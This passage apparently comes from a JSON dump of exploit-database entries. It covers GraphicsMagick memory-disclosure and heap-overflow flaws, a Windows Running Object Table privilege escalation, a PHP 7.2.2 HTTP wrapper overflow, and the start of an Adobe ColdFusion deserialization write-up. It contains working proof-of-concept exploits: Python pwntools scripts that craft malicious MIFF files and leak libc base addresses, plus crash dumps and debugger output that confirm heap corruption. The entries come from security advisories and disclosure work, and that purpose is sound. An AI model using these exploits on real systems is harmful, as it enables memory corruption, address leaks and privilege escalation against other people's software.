on a specially crafted MIFF format file with the verbose flag.\r\n\r\nProof of Concept\r\nThe following proof of concept script will generate a specially crafted MIFF file exploit.miff.\r\n'''\r\n\r\n#!/usr/bin/python\r\n \r\nfrom pwn import *\r\n \r\npartitions = ('id=ImageMagick version=1.0\\nclass=DirectClass matte=False\\n' +\r\n 'columns=1 rows=1 depth=16\\nscene=1\\nmontage=1x1+0+0\\n\\x0c\\n' +\r\n ':\\x1a',\r\n '\\n\\x00\\xbe\\xbe\\xbe\\xbe\\xbe\\xbe\\n')\r\noutput = \"exploit.miff\"\r\n \r\ndef main():\r\n payload = \"A\"*10000\r\n payload = partitions[0] + payload + partitions[1]\r\n file(output, \"w\").write(payload)\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n''' \r\nRunning the GraphicsMagick gm utility with the arguments identify -verbose in GDB and breaking after the vulnerable strncpy call, and examining the corrupted ImageInfo object demonstrates that the heap corruption was successful.\r\n\r\n\r\ngef\u27a4 r identify -verbose exploit.miff\r\n...\r\ngef\u27a4 br describe.c:856\r\nBreakpoint 1 at 0x4571df: file magick/describe.c, line 856.\r\n...\r\ngef\u27a4 p *image_info\r\n$3 = {\r\n...\r\n compression = UndefinedCompression,\r\n file = 0x0,\r\n magick = '\\000' <repeats 2052 times>,\r\n filename = 'A' <repeats 2053 times>,\r\n cache = 0x4141414141414141,\r\n definitions = 0x4141414141414141,\r\n attributes = 0x4141414141414141,\r\n ping = 0x41414141,\r\n preview_type = 1094795585,\r\n affirm = 0x41414141,\r\n blob = 0x4141414141414141,\r\n length = 0x4141414141414141,\r\n unique = 'A' <repeats 2053 times>,\r\n zero = 'A' <repeats 2053 times>,\r\n signature = 0x4141414141414141\r\n}\r\n'''", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/43111/"}, {"lastseen": "2017-05-17T16:49:36", "bulletinFamily": "exploit", "description": "Microsoft Windows - Running Object Table Register ROTFLAGS_ALLOWANYCLIENT Privilege Escalation. CVE-2017-0214. Dos exploit for Windows platform. Tags: Denial...", "modified": "2017-05-17T00:00:00", "published": "2017-05-17T00:00:00", "id": "EDB-ID:42021", "href": "https://www.exploit-db.com/exploits/42021/", "type": "exploitdb", "title": "Microsoft Windows - Running Object Table Register ROTFLAGS_ALLOWANYCLIENT Privilege Escalation", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1112\r\n\r\nWindows: Running Object Table Register ROTFLAGS_ALLOWANYCLIENT EoP\r\nPlatform: Windows 10 10586/14393 not tested 8.1 Update 2 or Windows 7\r\nClass: Elevation of Privilege\r\n\r\nSummary:\r\nBy setting an appropriate AppID it\u2019s possible for a normal user process to set a global ROT entry. This can be abused to elevate privileges.\r\n\r\nDescription:\r\n\r\nNOTE: I\u2019m not sure which part of this chain to really report. As far as I can tell it\u2019s pretty much all by design and fixing the initial vector seems difficult. Perhaps this is only a bug which can be fixed to prevent sandbox escapes?\r\n\r\nWhen registering an object in the ROT the default is to only expose that registration to the same user identity on the same desktop/window station. This includes preventing the same user at different ILs (such as between sandbox and normal user) from seeing the same registration. However it could be imagined that you might want to register an entry for all users/contexts so IRunningObjectTable::Register takes a grfFlags parameter with the value ROTFLAGS_ALLOWANYCLIENT which allows the ROT entry to be exposed to all users. \r\n\r\nThe description of this flag indicates it can only be used if the COM process is a Local Service or a RunAs application. In fact there\u2019s an explicit ROTFlags value for the AppID which would grant the privilege to a normal application. Quick testing proves this to be correct, a \u201cnormal\u201d application cannot expose the ROT entry to any client as RPCSS does a check that the calling process is allowed to expose the entry. However there are two clear problems with the check. Creating a RunAs COM object in the current session would typically run at the same privilege level as the caller, therefore an application which wanted to abuse this feature could inject code into that process. Secondly while it\u2019s not possible to register a per-user COM object which specifies a RunAs AppID it\u2019s possible to explicitly set the AppID when calling CoInitializeSecurity (either via the GUID or by naming your program to match one which maps to the correct AppID).\r\n\r\nTherefore in the current implementation effectively any process, including sandboxed ones should be able to register a global ROT entry. What can we do with this? The ROT is mainly used for OLE duties, for example Word and Visual Studio register entries for each document/project open. It would be nice not to rely on this, so instead I\u2019ll abuse another OLE component, which we\u2019ve seen before, the fact that LoadTypeLib will fall back to a moniker if it can\u2019t find the type library file specified.\r\n\r\nIf the file loading fails then LoadTypeLib will effectively call MkParseDisplayName on the passed in string. One of the things MPDN does is try and create a file moniker with the string passed in as an argument. File Monikers have an interesting feature, the COM libraries will check if there\u2019s a registered ROT entry for this file moniker already present, if it is instead of creating a new object it will call IRunningObjectTable::GetObject instead when binding. So as we can register a ROT entry for any user in any context we can provide our own implementation of ITypeLib running inside our process, by registering it against the path to the type library any other process which tries to open that library would instead get our spoofed one, assuming we can force the file open to fail.\r\n\r\nThis is the next key part, looking at the LoadTypeLib implementation the code calls FindTypeLib if this function fails the code will fall back to the moniker route. There\u2019s two opportunities here, firstly CreateFile is called on the path, we could cause this to fail by opening the file with no sharing mode, in theory it should fail. However in practice it doesn\u2019t most type libraries are in system location, if you don\u2019t have the possibility of write permission on the file the OS automatically applies FILE_SHARE_READ which makes it impossible to lock the file in its entirety. Also some TLBs are stored inside a DLL which is then used so this route is out. Instead the other route is more promising, VerifyIsExeOrTlb is called once the file is open to check the type of file to parse. This function tries to load the first 64 bytes and checks for magic signatures. We can cause the read to fail by using the LockFile API to put an exclusive lock on that part of the file. This also has the advantage that it doesn\u2019t affect file mappings so will also work with loaded DLLs. \r\n\r\nWe now can cause any user of a type library to get redirected to our \u201cfake\u201d one without abusing impersonation/symbolic link tricks. How can we use this to our advantage? The final trick is to abuse again the auto-generation of Stubs/Proxies from automation compatible interfaces. If we can get a more privileged process to use our type library when creating a COM stub we can cause a number of memory safety issues such as type confusion, arbitrary memory read/writes and extending the vtable to call arbitrary functions. This is an extremely powerful primitive, as long as you can find a more privileged process which uses a dual automation interface. For example the FlashBroker which is installed on every Win8+ machine is intentionally allowed to be created by sandboxed IE/Edge and uses dual interfaces with auto-generated Stubs. We could abuse for example the BrokerPrefSetExceptionDialogSize and BrokerPrefGetExceptionDialogSize to do arbitrary memory writes. This all works because the stub creation has no was of ensuring that the actual server implementation matches the generated stub (at least without full symbols) so it will blindly marshal pointers or call outside of the object's vtable.\r\n\r\nProof of Concept:\r\n\r\nI\u2019ve provided a PoC as a C# project. You need to compile it first. It fakes out the Windows Search Service\u2019s type library to modify the IGatherManagerAdmin2::GetBackoffReason method so that instead of marshaling a pointer to an integer for returning the caller can specify an arbitrary pointer value. When the method on the server side completes it will try and write a value to this address which will cause a Write AV. The Windows Search service would be ideal for abuse but many of the functions seem to require Administrator access to call. That\u2019s not to say you couldn\u2019t convert this into a full working exploit but I didn\u2019t.\r\n\r\n1) Compile the C# project. It should be compiled as a 64 bit executable.\r\n2) Restart the Windows Search service just to ensure it hasn\u2019t cached the stub previously. This probably isn\u2019t necessary but just to be certain.\r\n3) Attach a debugger to SearchIndexer.exe to catch the crash.\r\n4) Execute the PoC as a normal user (do not run under the VSHOST as the CoInitializeSecurity call will fail). You need to pass the path to the provided mssitlb.tlb file which has been modified appropriately.\r\n5) The service should crash trying to write a value to address 0x12345678\r\n\r\nCrash Dump:\r\n\r\n0:234> r\r\nrax=0000015ee04665a0 rbx=0000015ee0466658 rcx=0000015ee0466658\r\nrdx=0000000000000000 rsi=0000000000000004 rdi=0000000000000000\r\nrip=00007fff80e3a75d rsp=00000036541fdae0 rbp=00000036541fdb20\r\n r8=00000036541fd868 r9=0000015ee3bb50b0 r10=0000000000000000\r\nr11=0000000000000246 r12=0000015ee3c02988 r13=00000036541fe1c0\r\nr14=0000000012345678 r15=0000000000000000\r\niopl=0 nv up ei pl zr na po nc\r\ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246\r\nMSSRCH!CGatheringManager::GetBackoffReason+0x8d:\r\n00007fff`80e3a75d 418936 mov dword ptr [r14],esi ds:00000000`12345678=????????\r\n0:234> k\r\n # Child-SP RetAddr Call Site\r\n00 00000036`541fdae0 00007fff`b416d533 MSSRCH!CGatheringManager::GetBackoffReason+0x8d\r\n01 00000036`541fdb10 00007fff`b413b0d0 RPCRT4!Invoke+0x73\r\n02 00000036`541fdb60 00007fff`b2fa479a RPCRT4!NdrStubCall2+0x430\r\n03 00000036`541fe180 00007fff`b3853c93 combase!CStdStubBuffer_Invoke+0x9a [d:\\th\\com\\combase\\ndr\\ndrole\\stub.cxx @ 1446]\r\n04 00000036`541fe1c0 00007fff`b305ccf2 OLEAUT32!CUnivStubWrapper::Invoke+0x53\r\n05 (Inline Function) --------`-------- combase!InvokeStubWithExceptionPolicyAndTracing::__l7::<lambda_b8ffcec6d47a5635f374132234a8dd15>::operator()+0x42 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1805]\r\n06 00000036`541fe210 00007fff`b3001885 combase!ObjectMethodExceptionHandlingAction<<lambda_b8ffcec6d47a5635f374132234a8dd15> >+0x72 [d:\\th\\com\\combase\\dcomrem\\excepn.hxx @ 91]\r\n07 (Inline Function) --------`-------- combase!InvokeStubWithExceptionPolicyAndTracing+0x9e [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1808]\r\n08 00000036`541fe280 00007fff`b3006194 combase!DefaultStubInvoke+0x275 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1880]\r\n09 (Inline Function) --------`-------- combase!SyncStubCall::Invoke+0x1b [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1934]\r\n0a (Inline Function) --------`-------- combase!SyncServerCall::StubInvoke+0x1b [d:\\th\\com\\combase\\dcomrem\\servercall.hpp @ 736]\r\n0b (Inline Function) --------`-------- combase!StubInvoke+0x297 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 2154]\r\n0c 00000036`541fe4a0 00007fff`b3008b47 combase!ServerCall::ContextInvoke+0x464 [d:\\th\\com\\combase\\dcomrem\\ctxchnl.cxx @ 1568]\r\n0d (Inline Function) --------`-------- combase!CServerChannel::ContextInvoke+0x83 [d:\\th\\com\\combase\\dcomrem\\ctxchnl.cxx @ 1458]\r\n0e (Inline Function) --------`-------- combase!DefaultInvokeInApartment+0x9e [d:\\th\\com\\combase\\dcomrem\\callctrl.cxx @ 3438]\r\n0f 00000036`541fe770 00007fff`b3007ccd combase!AppInvoke+0x8a7 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1618]\r\n10 00000036`541fe8a0 00007fff`b300b654 combase!ComInvokeWithLockAndIPID+0xb2d [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 2686]\r\n11 00000036`541feb30 00007fff`b40fd433 combase!ThreadInvoke+0x1724 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 6954]\r\n12 00000036`541fedc0 00007fff`b40fbed8 RPCRT4!DispatchToStubInCNoAvrf+0x33\r\n13 00000036`541fee10 00007fff`b40fcf04 RPCRT4!RPC_INTERFACE::DispatchToStubWorker+0x288\r\n14 00000036`541fef10 00007fff`b40f922d RPCRT4!RPC_INTERFACE::DispatchToStubWithObject+0x404\r\n15 00000036`541fefb0 00007fff`b40f9da9 RPCRT4!LRPC_SCALL::DispatchRequest+0x35d\r\n16 00000036`541ff090 00007fff`b40f64dc RPCRT4!LRPC_SCALL::HandleRequest+0x829\r\n17 00000036`541ff180 00007fff`b40f48c9 RPCRT4!LRPC_SASSOCIATION::HandleRequest+0x45c\r\n18 00000036`541ff200 00007fff`b411eaca RPCRT4!LRPC_ADDRESS::ProcessIO+0xb29\r\n19 00000036`541ff350 00007fff`b422e490 RPCRT4!LrpcIoComplete+0x10a\r\n1a 00000036`541ff3f0 00007fff`b422bc66 ntdll!TppAlpcpExecuteCallback+0x360\r\n1b 00000036`541ff4a0 00007fff`b34b8102 ntdll!TppWorkerThread+0x916\r\n1c 00000036`541ff8b0 00007fff`b425c5b4 KERNEL32!BaseThreadInitThunk+0x22\r\n1d 00000036`541ff8e0 00000000`00000000 ntdll!RtlUserThreadStart+0x34\r\n\r\nExpected Result:\r\nNot doing what ever it did.\r\n\r\nObserved Result:\r\nIt did it!\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42021.zip\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/42021/"}], "packetstorm": [{"lastseen": "2018-06-07T02:15:45", "bulletinFamily": "exploit", "description": "", "modified": "2018-06-06T00:00:00", "published": "2018-06-06T00:00:00", "id": "PACKETSTORM:148068", "href": "https://packetstormsecurity.com/files/148068/PHP-7.22-php_stream_url_wrap_http_ex-Buffer-Overflow.html", "title": "PHP 7.22 php_stream_url_wrap_http_ex Buffer Overflow", "type": "packetstorm", "sourceData": "`Description: \n------------ \nThe latest PHP distributions contain a memory corruption bug while parsing malformed HTTP response packets. Vulnerable code at: \n \nphp_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723 \n \nif (tmp_line[tmp_line_len - 1] == '\\n') { \n--tmp_line_len; \nif (tmp_line[tmp_line_len - 1] == '\\r') { \n--tmp_line_len; \n} \n} \n \nIf the proceeding buffer contains '\\r' as either controlled content or junk on stack, under a realistic setting (non-ASAN), tmp_line_len could go do -1, resulting in an extra large string being copied subsequently. Under ASAN a segfault can be observed. \n \n$ bin/php --version \nPHP 7.2.2 (cli) (built: Feb 20 2018 08:51:24) ( NTS ) \nCopyright (c) 1997-2018 The PHP Group \nZend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies \n \n \nTest script: \n--------------- \n$ xxd -g 1 poc \n0000000: 30 30 30 30 30 30 30 30 30 31 30 30 0a 0a 000000000100.. \n \n$ nc -vvlp 8080 < poc \nListening on [0.0.0.0] (family 0, port 8080) \nConnection from [127.0.0.1] port 8080 [tcp/http-alt] accepted (family 2, sport 53083) \nGET / HTTP/1.0 \nHost: localhost:8080 \nConnection: close \n \n$ bin/php -r 'file_get_contents(\"http://localhost:8080\");' \n \nExpected result: \n---------------- \nNO CRASH \n \nActual result: \n-------------- \n$ bin/php -r 'file_get_contents(\"http://localhost:8080\");' \n================================================================= \n==26249== ERROR: AddressSanitizer: stack-buffer-overflow on address 0xbfc038ef at pc 0x8aa393b bp 0xbfc02eb8 sp 0xbfc02eac \nREAD of size 1 at 0xbfc038ef thread T0 \n#0 0x8aa393a in php_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723 \n#1 0x8aa61fb in php_stream_url_wrap_http /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:979 \n#2 0x8b8b115 in _php_stream_open_wrapper_ex /home/weilei/php-7.2.2/main/streams/streams.c:2027 \n#3 0x8918dc0 in zif_file_get_contents /home/weilei/php-7.2.2/ext/standard/file.c:550 \n#4 0x867993a in phar_file_get_contents /home/weilei/php-7.2.2/ext/phar/func_interceptors.c:224 \n#5 0x91ee267 in ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:573 \n#6 0x91ee267 in execute_ex /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:59731 \n#7 0x923c13c in zend_execute /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:63760 \n#8 0x8cba975 in zend_eval_stringl /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1082 \n#9 0x8cbaf66 in zend_eval_stringl_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1123 \n#10 0x8cbb06b in zend_eval_string_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1134 \n#11 0x9244455 in do_cli /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1042 \n#12 0x9246b37 in main /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1404 \n#13 0xb5e8ca82 (/lib/i386-linux-gnu/libc.so.6+0x19a82) \n#14 0x80656d0 in _start (/home/weilei/php7_asan/bin/php+0x80656d0) \nAddress 0xbfc038ef is located at offset 607 in frame <php_stream_url_wrap_http_ex> of T0's stack: \nThis frame has 13 object(s): \n[32, 36) 'transport_string' \n[96, 100) 'errstr' \n[160, 164) 'http_header_line_length' \n[224, 232) 'timeout' \n[288, 296) 'req_buf' \n[352, 360) 'tmpstr' \n[416, 432) 'ssl_proxy_peer_name' \n[480, 496) 'http_header' \n[544, 576) 'buf' \n[608, 736) 'tmp_line' \n[768, 1792) 'location' \n[1824, 2848) 'new_path' \n[2880, 3904) 'loc_path' \nHINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext \n(longjmp and C++ exceptions *are* supported) \nSUMMARY: AddressSanitizer: stack-buffer-overflow /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723 php_stream_url_wrap_http_ex \nShadow bytes around the buggy address: \n0x37f806c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \n0x37f806d0: 00 00 f1 f1 f1 f1 04 f4 f4 f4 f2 f2 f2 f2 04 f4 \n0x37f806e0: f4 f4 f2 f2 f2 f2 04 f4 f4 f4 f2 f2 f2 f2 00 f4 \n0x37f806f0: f4 f4 f2 f2 f2 f2 00 f4 f4 f4 f2 f2 f2 f2 00 f4 \n0x37f80700: f4 f4 f2 f2 f2 f2 00 00 f4 f4 f2 f2 f2 f2 00 00 \n=>0x37f80710: f4 f4 f2 f2 f2 f2 00 00 00 00 f2 f2 f2[f2]00 00 \n0x37f80720: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f2 f2 \n0x37f80730: f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \n0x37f80740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \n0x37f80750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \n0x37f80760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \nShadow byte legend (one shadow byte represents 8 application bytes): \nAddressable: 00 \nPartially addressable: 01 02 03 04 05 06 07 \nHeap left redzone: fa \nHeap righ redzone: fb \nFreed Heap region: fd \nStack left redzone: f1 \nStack mid redzone: f2 \nStack right redzone: f3 \nStack partial redzone: f4 \nStack after return: f5 \nStack use after scope: f8 \nGlobal redzone: f9 \nGlobal init order: f6 \nPoisoned by user: f7 \nASan internal: fe \n==26249== ABORTING \nAborted \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/148068/php722-overflow.txt"}, {"lastseen": "2017-11-05T20:00:04", "bulletinFamily": "exploit", "description": "", "modified": "2017-11-03T00:00:00", "published": "2017-11-03T00:00:00", "href": "https://packetstormsecurity.com/files/144878/GraphicsMagick-Memory-Disclosure-Heap-Overflow.html", "id": "PACKETSTORM:144878", "title": "GraphicsMagick Memory Disclosure / Heap Overflow", "type": "packetstorm", "sourceData": "`'''Vulnerabilities summary \nThe following advisory describes two (2) vulnerabilities found in GraphicsMagick. \n \nGraphicsMagick is aThe swiss army knife of image processing. Comprised of 267K physical lines (according to David A. Wheeleras SLOCCount) of source code in the base package (or 1,225K including 3rd party libraries) it provides a robust and efficient collection of tools and libraries which support reading, writing, and manipulating an image in over 88 major formats including important formats like DPX, GIF, JPEG, JPEG-2000, PNG, PDF, PNM, and TIFF.a \n \nThe vulnerabilities found are: \n \nMemory Information Disclosure \nHeap Overflow \nCredit \nAn independent security researchers, Jeremy Heng (@nn_amon) and Terry Chia (Ayrx), has reported this vulnerability to Beyond Securityas SecuriTeam Secure Disclosure program \n \nVendor response \nThe vendor has released patches to address these vulnerabilities (15237:e4e1c2a581d8 and 15238:7292230dd18). \n \nFor more details: ftp://ftp.graphicsmagick.org/pub/GraphicsMagick/snapshots/ChangeLog.txt \n \n \nVulnerabilities details \n \nMemory Information Disclosure \nGraphicsMagick is vulnerable to a memory information disclosure vulnerability found in DescribeImage function of the magick/describe.c file. \n \nThe portion of the code containing the vulnerability responsible of printing the IPTC Profile information contained in the image. \n \nThis vulnerability can be triggered with a specially crafted MIFF file. \n \nThe code which triggers the vulnerable code path is: \n \n63 MagickExport MagickPassFail DescribeImage(Image *image,FILE *file, \n64 const MagickBool verbose) \n65 { \n... \n660 for (i=0; i < profile_length; ) \n661 { \n662 if (profile[i] != 0x1c) \n663 { \n664 i++; \n665 continue; \n666 } \n667 i++; /* skip file separator */ \n668 i++; /* skip record number */ \n... \n725 i++; \n726 (void) fprintf(file,\" %.1024s:\\n\",tag); \n727 length=profile[i++] << 8; \n728 length|=profile[i++]; \n729 text=MagickAllocateMemory(char *,length+1); \n730 if (text != (char *) NULL) \n731 { \n732 char \n733 **textlist; \n734 \n735 register unsigned long \n736 j; \n737 \n738 (void) strncpy(text,(char *) profile+i,length); \n739 text[length]='\\0'; \n740 textlist=StringToList(text); \n741 if (textlist != (char **) NULL) \n742 { \n743 for (j=0; textlist[j] != (char *) NULL; j++) \n744 { \n745 (void) fprintf(file,\" %s\\n\",textlist[j]); \n... \n752 i+=length; \n753 } \n \n \nThe value in profile_length variable is set in the following field in the MIFF header: profile-iptc=8 \n \nThere is an out-of-bounds buffer dereference whenever profile[i] is accessed because the increments of i is never checked. \n \nIf we break on line 738 of describe.c, we can explore what is present on the heap during the strncpy operation. \n \n \ngefa$? x/2xg profile \n0x8be210: 0x08000a001c414141 0x00007ffff690fba8 \n \n \nThe 8 bytes 0x08000a001c414141 is the profile payload present in the specially crafted MIFF file. \n \n \n41 41 41 - padding \n1C - sentinel check in line 662 \n00 - padding \n0A - \"Priority\" tag \n08 00 - 8 in big endian, the length \n \n \nIf we examine the value 0x00007ffff690fba8 adjacent to the payload, it becomes apparent that it is an address within the main_arena struct in libc. \n \n \ngefa$? x/xw 0x00007ffff690fba8 \n0x7ffff690fba8 <main_arena+136>: 0x008cdc40 \ngefa$? vmmap libc \nStart End Offset Perm Path \n0x00007ffff654b000 0x00007ffff670b000 0x0000000000000000 r-x \n/lib/x86_64-linux-gnu/libc-2.23.so \n0x00007ffff670b000 0x00007ffff690b000 0x00000000001c0000 --- \n/lib/x86_64-linux-gnu/libc-2.23.so \n0x00007ffff690b000 0x00007ffff690f000 0x00000000001c0000 r-- \n/lib/x86_64-linux-gnu/libc-2.23.so \n0x00007ffff690f000 0x00007ffff6911000 0x00000000001c4000 rw- \n/lib/x86_64-linux-gnu/libc-2.23.so \n \nNow we can calculate the offset to libc base a 0x3c4b98 \n \nProof of Concept \n \n$ python miff/readexploit.py \n[+] Starting local process a/usr/bin/gma: pid 20019 \n[+] Receiving all data: Done (1.27KB) \n[*] Process a/usr/bin/gma stopped with exit code 0 (pid 20019) \n[*] Main Arena Leak: 0x7f72948adb98 \n[*] libc Base: 0x7f72944e9000 \n \n#!/usr/bin/python \n# GraphicsMagick IPTC Profile libc Leak \n \nfrom pwn import * \n \ndirectory = \"DIR\" \npartitions = ('id=ImageMagick version=1.0\\nclass=DirectClass matte=False\\n' + \n'columns=1 rows=1 depth=16\\nscene=1\\nmontage=1x1+0+0\\nprofil' + \n'e-iptc=', \n'\\n\\x0c\\n:\\x1a', \n'\\n\\x00', \n'\\n\\x00\\xbe\\xbe\\xbe\\xbe\\xbe\\xbe\\n') \noutput = \"readexploit.miff\" \nlength = 8 \n \n#libc_main_arena_entry_offset = 0x3c4ba8 \nlibc_main_arena_entry_offset = 0x3c4b98 \n \ndef main(): \ndata = \"AAA\" + \"\\x1c\" + \"\\x00\" + chr(10) + p16(0x8, endian=\"big\") \nheader = partitions[0] + str(length) + partitions[1] \npayload = header + directory + partitions[2] + data + partitions[3] \nfile(output, \"w\").write(payload) \n \np = process(executable=\"gm\", argv=[\"identify\", \"-verbose\", output]) \noutput_leak = p.recvall() \npriority_offset = output_leak.index(\"Priority:\") + 12 \nmontage_offset = output_leak.index(\"Montage:\") - 3 \nleak = output_leak[priority_offset:montage_offset] \nif \"0x00000000\" in leak: \nlog.info(\"Unlucky run. Value corrupted by StringToList\") \nexit() \nmain_arena_leak = u64(leak.ljust(8, \"\\x00\")) \nlog.info(\"Main Arena Leak: 0x%x\" % main_arena_leak) \nlibc_base = main_arena_leak - libc_main_arena_entry_offset \nlog.info(\"libc Base: 0x%x\" % libc_base) \n \nif __name__ == \"__main__\": \nmain() \n \n \nHeap Overflow \nGraphicsMagick is vulnerable to a heap overflow vulnerability found in DescribeImage() function of the magick/describe.c file. \n \nThe call to strncpy on line 855 does not limit the size to be copied to the size of the buffer copied to. Instead, the size is calculated by searching for a newline or a null byte in the directory name. \n \n844 /* \n845 Display visual image directory. \n846 */ \n847 image_info=CloneImageInfo((ImageInfo *) NULL); \n848 (void) CloneString(&image_info->size,\"64x64\"); \n849 (void) fprintf(file,\" Directory:\\n\"); \n850 for (p=image->directory; *p != '\\0'; p++) \n851 { \n852 q=p; \n853 while ((*q != '\\n') && (*q != '\\0')) \n854 q++; \n855 (void) strncpy(image_info->filename,p,q-p); \n856 image_info->filename[q-p]='\\0'; \n857 p=q; \n... \n880 } \n881 DestroyImageInfo(image_info); \n \nSince the field filename in the ImageInfo struct has the static size of 2053, the heap can be corrupted by forging an overly long directory name. \n \n \ntype = struct _ImageInfo { \n... \nFILE *file; \nchar magick[2053]; \nchar filename[2053]; \n_CacheInfoPtr_ cache; \nvoid *definitions; \nImage *attributes; \nunsigned int ping; \nPreviewType preview_type; \nunsigned int affirm; \n_BlobInfoPtr_ blob; \nsize_t length; \nchar unique[2053]; \nchar zero[2053]; \nunsigned long signature; \n} \n \nOne possible way to trigger the vulnerability is to run the identify command on a specially crafted MIFF format file with the verbose flag. \n \nProof of Concept \nThe following proof of concept script will generate a specially crafted MIFF file exploit.miff. \n''' \n \n#!/usr/bin/python \n \nfrom pwn import * \n \npartitions = ('id=ImageMagick version=1.0\\nclass=DirectClass matte=False\\n' + \n'columns=1 rows=1 depth=16\\nscene=1\\nmontage=1x1+0+0\\n\\x0c\\n' + \n':\\x1a', \n'\\n\\x00\\xbe\\xbe\\xbe\\xbe\\xbe\\xbe\\n') \noutput = \"exploit.miff\" \n \ndef main(): \npayload = \"A\"*10000 \npayload = partitions[0] + payload + partitions[1] \nfile(output, \"w\").write(payload) \n \nif __name__ == \"__main__\": \nmain() \n \n''' \nRunning the GraphicsMagick gm utility with the arguments identify -verbose in GDB and breaking after the vulnerable strncpy call, and examining the corrupted ImageInfo object demonstrates that the heap corruption was successful. \n \n \ngefa$? r identify -verbose exploit.miff \n... \ngefa$? br describe.c:856 \nBreakpoint 1 at 0x4571df: file magick/describe.c, line 856. \n... \ngefa$? p *image_info \n$3 = { \n... \ncompression = UndefinedCompression, \nfile = 0x0, \nmagick = '\\000' <repeats 2052 times>, \nfilename = 'A' <repeats 2053 times>, \ncache = 0x4141414141414141, \ndefinitions = 0x4141414141414141, \nattributes = 0x4141414141414141, \nping = 0x41414141, \npreview_type = 1094795585, \naffirm = 0x41414141, \nblob = 0x4141414141414141, \nlength = 0x4141414141414141, \nunique = 'A' <repeats 2053 times>, \nzero = 'A' <repeats 2053 times>, \nsignature = 0x4141414141414141 \n} \n''' \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/144878/graphicsmagick-discloseoverflow.txt"}], "seebug": [{"lastseen": "2018-03-31T18:25:41", "bulletinFamily": "exploit", "description": "### Exploiting Adobe ColdFusion before CVE-2017-3066\r\nIn a recent penetration test my teammate Thomas came across several servers running Adobe ColdFusion 11 and 12. Some of them were vulnerable to CVE-2017-3066 but no outgoing TCP connections were possible to exploit the vulnerability. He asked me whether I had an idea how he could still get a SYSTEM shell and the outcome of the short research effort is documented here.\r\n\r\n### INTRODUCTION ADOBE COLDFUSION & AMF\r\nBefore we go into technical details, I will give you a short intro to Adobe ColdFusion (CF). Adobe ColdFusion is an Application Development Platform like ASP.net, however several years older. Adobe ColdFusion allows a developer to build websites, SOAP and REST web services and interact with Adobe Flash using the Action Message Format (AMF).\r\n\r\nThe AMF protocol is a custom binary serialization protocol. It has two formats, AMF0 and AMF3. An Action Message consists of headers and bodies. Several data types are supported in AMF0 and AMF3. For example the AMF3 format supports the following protocol elements with their type identifier:\r\n```\r\nUndefined - 0x00\r\nNull - 0x01\r\nBoolean - 0x02\r\nBoolean - 0x03\r\nInteger - 0x04\r\nDouble - 0x05\r\nString - 0x06\r\nXML - 0x07\r\nDate - 0x08\r\nArray - 0x09\r\nObject - 0x0A\r\nXML End - 0x0B\r\nByteArray - 0x0C\r\n```\r\n\r\nDetails about the binary message formats of AMF0 and AMF3 can be found on Wikipedia (see https://en.wikipedia.org/wiki/Action_Message_Format).\r\n\r\nThere are several implementations for AMF in different languages. For Java we have Adobe BlazeDS (now Apache BlazeDS), which is also used in Adobe ColdFusion.\r\n\r\nThe BlazeDS AMF serializer can serialize complex object graphs. The serializer starts with the root object and serializes its members recursively.\r\n\r\nTwo general serialization techniques are supported by BlazeDS to serialize complex objects:\r\n* Serialization of Bean Properties (AMF0 and AMF3)\r\n* Serialization using Java's java.io.Externalizable interface. (AMF3)\r\n\r\n### Serialization of Bean Properties\r\nThis technique requires the object to be serialized to have a public no-arg constructor and for every member public Getter-and Setter-Methods (JavaBeans convention).\r\n\r\nIn order to collect all member values of an object, the AMF serializer invokes all Getter-methods during serialization. The member names and values are put in the Action message body with the class name of the object.\r\n\r\nDuring deserialization, the classname is taken from the Action Message, a new object is constructed and for every member name the corresponding set method is called with the value as argument. This all happens either in method readScriptObject() of class flex.messaging.io.amf.Amf3Input or readObjectValue() of class flex.messaging.io.amf.Amf0Input.\r\n\r\n### Serialization using Java's java.io.Externalizable interface\r\nBlazeDS further supports serialization of complex objects of classes implementing the java.io.Externalizable interface which inherits from java.io.Serializable.\r\n```\r\npublic abstract interface Externalizable\r\n extends Serializable\r\n{\r\n 